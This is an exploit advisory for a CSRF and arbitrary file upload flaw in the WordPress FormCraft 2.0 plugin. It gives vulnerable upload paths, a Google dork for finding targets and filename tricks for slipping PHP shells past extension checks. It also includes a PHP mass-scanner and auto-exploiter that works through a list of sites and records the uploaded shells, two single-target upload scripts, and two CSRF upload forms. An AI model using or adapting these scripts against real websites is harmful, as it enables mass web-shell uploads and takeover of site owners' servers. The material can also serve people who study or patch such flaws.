WordPress FormCraft 2.0 CSRF / Shell Upload

WordPress version 5.0.4 with FormCraft plugin version 2.0 suffers from a cross site request forgery vulnerability that can be leveraged to perform a shell upload.


MD5 | 34bba172e28c83ea38f0a59db712f769

############################################################################################

# Exploit Title : WordPress 5.0.4 FormCraft Plugins 2.0 CSRF Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/03/2019
# Vendor Homepages : formcraft-wp.com ~ ncrafts.net ~ formcrafts.com
# Software Download Links : formcrafts.com/formcrafts-form-builder.zip
downloads.wordpress.org/plugin/formcraft-form-builder.zip
# Software Information Links : wordpress.org/plugins/formcraft-form-builder/
wpexplorer.com/formcraft-drag-drop-form-builder-wordpress-plugin/
codecanyon.net/item/formcraft-premium-wordpress-form-builder/5335056
formcrafts.com/integrations/wordpress
formcraft-wp.com/addons/stripe/
# Software Affected Version : 1.2.0 - 1.2.1 - 1.2.3 / 2.0 and All Versions
Compatible with WordPress [ Vulnerable WP Versions ] =>
3.6 - 4.2.2 - 4.2.7 - 4.5 - 4.9.9 - 4.9.1 - 5.0.x - 5.0.4
# Software Price Type : Free / Paid Download / 36$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/formcraft/''
# Vulnerability Type :
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# JVN : jvn.jp/en/jp/JVN83501605/index.html
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-wordpress-formcraft-auto-php-csrf-exploiter.html

############################################################################################

# Description about Software :
***************************
FormCraft is a drag-and-drop form builder to create and embed forms, and track submissions for WordPress.

############################################################################################

# Impact :
***********
* The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within

the product's environment. * Weaknesses in this category are related to the management of permissions, privileges, and

other security features that are used to perform access control. * This software has Cross Site Request Forgery Vulnerability

because the web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally

provided by the user who submitted the request.

* The vulnerability CSRF allows a remote attacker to perform cross-site request forgery attacks.

The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can trick the victim to visit a

specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website, such as generat

new forms, insert JavaScript code to existing forms, and delete existing forms.

* WordPress FormCraft Plugins 2.0 and 1.2.3 and other versions is prone to a

vulnerability that lets attackers upload arbitrary files because the application fails to properly verify user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process.

This may facilitate unauthorized access or privilege escalation; other attacks are also possible. WordPress 5.0.4

FormCraft 2.0 and 1.2.3 is vulnerable; prior versions may also be affected.

############################################################################################

Installation =>
*************
Extract the download package to a temporary location.
Zip the folder formcraft
Log in to WordPress and click on the Add New option under Plugins.
Click on the Upload link.
Click on Choose File and browse the zipped file formcraft and click on Install.
Now activate the plugin
If you are facing trouble with the file upload field, you need to set the permissions of the directory
/wp-content/plugins/formcraft/file-upload/server/ and sub directories, and files to 755

############################################################################################

# CSRF / PHP / Arbitrary File Upload / File Insertion Exploit :
*****************************************************
Vulnerability =>
**************
/wp-content/plugins/formcraft/file-upload/server/php/upload.php

/wp-content/plugins/formcraft/file-upload/server/content/upload.php

Vulnerability Error =>
*********************
{"failed":"No file found 2"}

Directory File Path :
*******************
/wp-content/plugins/formcraft/file-upload/server/php/files/.....

/wp-content/plugins/formcraft/file-upload/server/content/files/....

/wp-content/plugins/formcraft/file-upload/server/php/files/[RANDOM-NUMBERS-WORDS]yourshellname.php

Note : yourfilename.html .txt .gif .png .gif - Try to upload your shell files extensions like this =>

SH3LL.php.pjpg - SH3LL.php;.gif - SH3LL.asp:,fla - SH3LL.phtml - SH3LL.php5 - SH3LL.php -

Sh3LL.asp;.jpeg - Sh3LL.php;.gif ;.jpeg - Sh3LL.php;.swf ;.flv - Sh3LL.php;.pjpg ;.jpeg and etcetra.....

Try on your Computer LocalHost.

Note 2 : If sites says like this " {"failed":"Not writable"} " The vulnerability has been fixed.

###########################################################################################

PHP Auto Exploitation Tool 1 =>
***************************
<?php
print"
Cyberizm WordPress FormCraft Scanner + Auto Exploiter
Mr. KingSkrupellos - Cyberizm Digital Security Team
";
error_reporting(0);
set_time_limit(0);

if(!file_exists($argv[1])){
die('
File Not Found
usage: php formcraft.php sites.txt

');
}
[email protected]('shell.phtml','a+');

$get=file_get_contents($argv[1]);
$ex=explode("\n",$get);
$c=file($argv[1]);
echo"Total target : ".count($c)."\n\n";

foreach($c as $sites){
echo "scanning site : $sites";
$sites=trim($sites);

$urlex='/wp-content/plugins/formcraft/file-upload/server/php/upload.php';
$url1=($sites).($urlex) ;
[email protected]_get_contents($url1);
if(eregi('{"files":',$get1)){
echo"[!] HAHAHA VULNERABILITY FOUND :* [!]\n";

$kingskrupellos = "loader.php"; // loader.php = <?php phpinfo();
// plz readme
$ewe = array("files[]"=>"@$kingskrupellos");
$ch = curl_init("$sites/wp-content/plugins/formcraft/file-upload/server/php/");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $ewe);
$data = curl_exec ($ch);
curl_close ($ch);
echo "[+]Exploited: $data\n\n";
fwrite($file,"<a href="."$sites/wp-content/plugins/formcraft/file-upload/server/php/files/$kingskrupellos"." target="."_blank".">$sites/wp-content/plugins/formcraft/file-upload/server/php/files/$kingskrupellos"."</a><br>");
}else{
echo"NOT VULN\n\n";
}
}
print "
shell saved in shell.phtml
";
?>

###########################################################################################

PHP Exploiter Code 2 :
*********************
<?php

$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[VULNERABLEWEBSITE]/wp-content/plugins/formcraft/file-upload/server/content/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

###########################################################################################

PHP Exploiter Code 3 :
*********************
<?php

$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[VULNERABLEWEBSITE]/wp-content/plugins/formcraft/file-upload/server/php/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

###########################################################################################

CSRF Cross Site Request Forgery Exploiter 1 =>
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

-------------------------------------------------------------------------------------------------------------------------------------------------------------

CSRF Cross Site Request Forgery Exploiter 2 =>
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/formcraft/file-upload/server/content/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################

Related Posts